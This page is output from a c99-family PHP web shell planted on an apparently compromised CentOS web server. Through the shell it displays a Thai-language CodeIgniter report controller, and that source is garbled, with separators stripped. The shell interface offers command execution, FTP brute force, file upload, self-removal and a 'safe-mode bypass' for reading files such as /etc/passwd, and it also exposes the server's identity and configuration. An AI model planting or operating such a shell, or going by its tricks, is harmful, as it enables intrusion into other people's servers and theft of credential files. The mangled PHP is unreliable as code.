!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/var/www/html/mis/application/controllers/esa/   drwxr-xr-x
Free 50.99 GB of 127.8 GB (39.9%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     report.php (8.29 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
<?php
include("sa_controller.php");
class 
report extends Sa_controller {

    function 
get_dpj ($year,$mb_type) {
        
$this->load->model($this->config->item("sa_folder").'sa_detail_project_model''dpj');

        
$options = array();
        
$options[''] = "";
        
//if ($mb_type) {
            
$rs_dpj $this->dpj->get_detail2($year,$mb_type);
            foreach (
$rs_dpj->result() as $row) {
                
$options[$row->dpj_id] = $row->dpj_sub_name;
            }
        
//}
        
echo form_dropdown('dpj_id'$options,''"onChange='change_dpj(this.value)'");//," "
        //echo $options;
    
}

    function 
get_sc ($mb_type,$sc_id) {
        
$this->load->model($this->config->item("sa_folder").'sa_smo_club_model''sc');
        
        
$opt_sc[''] = "";
        if (
$mb_type) {
            
$this->sc->sc_type $mb_type;
            
$opt_sc $this->sc->get_optionsByType();
        }
        echo 
form_dropdown('sc_id'$opt_scset_value('sc_id',$sc_id));
    }

    function 
report() {
        
parent::__construct();
    }

    function 
project() {
        
$this->load->model($this->config->item('sa_folder').'sa_detail_project_model','dpj');
        
$dpj $this->dpj;
        
$dpj->dpj_bgY $this->input->post('year');
        
$dpj->dpj_owner $this->input->post('owner');
        
$dpj->dpj_attribute $this->input->post('atb_type');
        if (
$this->input->server('REQUEST_METHOD') === 'POST') {
            
$data['rs_dpj'] = $dpj->search_project_con();
        } else {
            
$data['rs_dpj'] = $dpj->get_by_key();
        }
        
$this->load->model($this->config->item('sa_folder').'sa_initialbudget_model','ib');
        if (
$this->ib->get_all()->num_rows()) {
            
$data['qu_ib'] = $this->ib->get_options();
        } else {
            
$data['qu_ib'] = $this->ib->get_options_noyear();
        }
        
$this->load->model($this->config->item('sa_folder').'sa_smo_club_model','sc');
        
$sc $this->sc;
        
$data['opt_sc'] = $sc->get_options();
        
$data['dpj_bgY'] = $dpj->dpj_bgY;
        
$data['dpj_owner'] = $dpj->dpj_owner;
        
$data['dpj_attribute'] = $dpj->dpj_attribute;
        
$data['rs_type'] = array(''  => '-----เลือก-----''1' => 'ภารกิจ''2' => 'กลยุทธ์');

        if (
$this->input->post('type') == 'print') {
            
$this->output_popup('v_print_project',$data);
        } else {
            
$this->output("v_rpt_project"$data);
        }
    }
    
    function 
integration() { 
        
$this->load->model($this->config->item('sa_folder').'sa_detail_project_model','dpj');
        
$dpj $this->dpj;
        
$dpj->dpj_bgY $this->input->post('year');
        
$dpj->dpj_owner $this->input->post('owner');
        
$dpj->dpj_attribute $this->input->post('atb_type');
        if (
$this->input->server('REQUEST_METHOD') === 'POST') {
            
$data['rs_dpj'] = $dpj->search_project_con();
            
$detail $this->input->post('detail');
            if(
$detail == 'detail'){
                
$data['rs_dpj'] = $dpj->search_project();
            }
        } else {
            
$data['rs_dpj'] = $dpj->get_by_key();
        }
        
//บูรณาการรฝ่ายอื่นๆ
        
$this->load->model($this->config->item('sa_folder').'sa_integration_project_model','igp');
        
$igp $this->igp;
        
$qu_igp $igp->get_by_cond();
        
        
//บูรณาการรายวิชา
        
$this->load->model($this->config->item('sa_folder').'sa_integration_course_model','igc');
        
$igc $this->igc;
        
$qu_igc $igc->get_by_cond();    
        
        
$this->load->model($this->config->item('sa_folder').'sa_initialbudget_model','ib');
        if (
$this->ib->get_all()->num_rows()) {
            
$data['qu_ib'] = $this->ib->get_options();
        } else {
            
$data['qu_ib'] = $this->ib->get_options_noyear();
        }
        
$this->load->model($this->config->item('sa_folder').'sa_smo_club_model','sc');
        
$sc $this->sc;
        
$data['opt_sc'] = $sc->get_options();
        
$data['dpj_bgY'] = $dpj->dpj_bgY;
        
$data['dpj_owner'] = $dpj->dpj_owner;
        
$data['dpj_attribute'] = $dpj->dpj_attribute;
        
$data['rs_type'] = array(''  => '-----เลือก-----''1' => 'ภารกิจ''2' => 'กลยุทธ์');
        
$data['ig_type'] = array('1' => 'บูรณาการอื่นๆ''2' => 'บูรณาก่ารรายวิชา');
        
$data['ig_data'] = array('1' => $qu_igp->row()->numIgp'2' => $qu_igc->row()->num_igc);
        
        if (
$this->input->post('type') == 'print') {
            
$this->output_popup('v_print_project',$data);
        } else {
            
$detail $this->input->post('detail');
            if(
$detail == 'detail'){
                
$this->output_popup('v_rpt_integration_detail',$data);
            }else{
                
$this->output("v_rpt_integration"$data);
            }
        }
    }
    
    function 
attend_dpj() {
        
$this->load->model($this->config->item('sa_folder').'sa_member_model','mb');
        
$mb $this->mb;
        if (
$this->input->server('REQUEST_METHOD') === 'POST') {
            
$mb->mb_year $this->input->post('year');
            if (
$this->input->post('mb_type') == 1) {
                
$mb->mb_mpj_id $this->input->post('dpj_id');
            } else if (
$this->input->post('mb_type') == 2) {
                
$mb->mb_acp_id $this->input->post('dpj_id');
            }
            
$mb->mb_std_id $this->input->post('v_search');        
            
$data['rs_dpj'] = $mb->search_dpj_con($this->input->post('mb_type'));
            
//echo $this->db->last_query();die;
        
} else {
            
$data['rs_dpj'] = $mb->get_by_key();
        }
        
        
$this->load->model($this->config->item('sa_folder').'sa_initialbudget_model','ib');
        if (
$this->ib->get_all()->num_rows()) {
            
$data['qu_ib'] = $this->ib->get_options('Y');
        } else {
            
$data['qu_ib'] = $this->ib->get_options_noyear('Y');
        }
        
$data['rs_type'] = array("""โครงการ""กิจกรรม");
        
$data['mb_year'] = $mb->mb_year;
        
$data['mb_type'] = ($this->input->post('mb_type'))? $this->input->post('mb_type') : ;
        
$data['dpj_id'] = $this->input->post('dpj_id');
        
$data['v_search'] = $this->input->post('v_search');
        
$data['opt_dpj'] = array("");
        if (
$this->input->post('type') == 'print') {
            
$this->output_popup('v_print_attend',$data);
        } else {
            
$this->output("v_rpt_attend"$data);
        }
    }

    function 
attend_sc() {
        
$this->load->model($this->config->item('sa_folder').'sa_member_model','mb');
        
$mb $this->mb;
        if (
$this->input->server('REQUEST_METHOD') === 'POST') {
            
$mb->mb_year $this->input->post('year');
            if (
$this->input->post('mb_type') == 1) {
                
$mb->mb_smo_id $this->input->post('sc_id');
            } else if (
$this->input->post('mb_type') == 2) {
                
$mb->mb_cl_id $this->input->post('sc_id');
            }
            
$mb->mb_year $this->input->post('year');
            
$mb->mb_std_id $this->input->post('v_search');
            
$data['rs_sc'] = $mb->search_sc_con($this->input->post('mb_type'));
        } else {
            
$data['rs_sc'] = $mb->get_by_key();
        }
        
$this->load->model($this->config->item('sa_folder').'sa_initialbudget_model','ib');
        if (
$this->ib->get_all()->num_rows()) {
            
$data['qu_ib'] = $this->ib->get_options();
        } else {
            
$data['qu_ib'] = $this->ib->get_options_noyear();
        }
        
$data['rs_type'] = array("""สโมสร""ชมรม");
        
$data['mb_year'] = $mb->mb_year;
        
$data['mb_type'] = ($this->input->post('mb_type'))? $this->input->post('mb_type') : ;
        
$data['sc_id'] = $this->input->post('sc_id');
        
$data['v_search'] = $this->input->post('v_search');
        
$data['opt_sc'] = array("");
        if (
$this->input->post('type') == 'print') {
            
$this->output_popup('v_print_attend_sc',$data);
        } else {
            
$this->output("v_rpt_attend_sc"$data);
        }
    }

    function 
smo_club() {
        
$this->load->model($this->config->item('sa_folder').'sa_member_model','mm');
        
$mm$this->mm;
        if (
$this->input->server('REQUEST_METHOD') === 'POST') {
            if (
$this->input->post('year') =='' || $this->input->post('tm') == 0) {
                if (
$this->input->post('year') =='') {
                    
$this->load->vars(array('mssyear' => "<font color='red'> กรุณาเลือกปีงบประมาณ </font>"));
                }
                if (
$this->input->post('tm') == 0) {
                    
$this->load->vars(array('msstm' => "<font color='red'> กรุณาเลือกภาคการศึกษา </font>"));
                }
                
$data['rs_club'] = $mm->get_by_key();
            } else {
                
$mm->mb_year $this->input->post('year');
                
$mm->mb_tmId $this->input->post('tm');
                
$data['rs_club'] = $mm->get_ct_by_type();
            }
        } else {
            
$data['rs_club'] = $mm->get_by_key();
        }
        
$this->load->model($this->config->item('sa_folder').'sa_initialbudget_model','ib');
        if (
$this->ib->get_all()->num_rows()) {
            
$data['qu_ib'] = $this->ib->get_options();
        } else {
            
$data['qu_ib'] = $this->ib->get_options_noyear();
        }
        
$data['qu_tm'] = array ("","1","2","3");
    
        
$data['year'] = $this->input->post('year');
        
$data['tm'] = $this->input->post('tm');

        if (
$this->input->post('type') == 'print') {
            
$this->output_popup('v_print_smo_club',$data);
        } else {
            
$this->output("v_rpt_smo_club"$data);
        }
    }

}

:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.014 ]--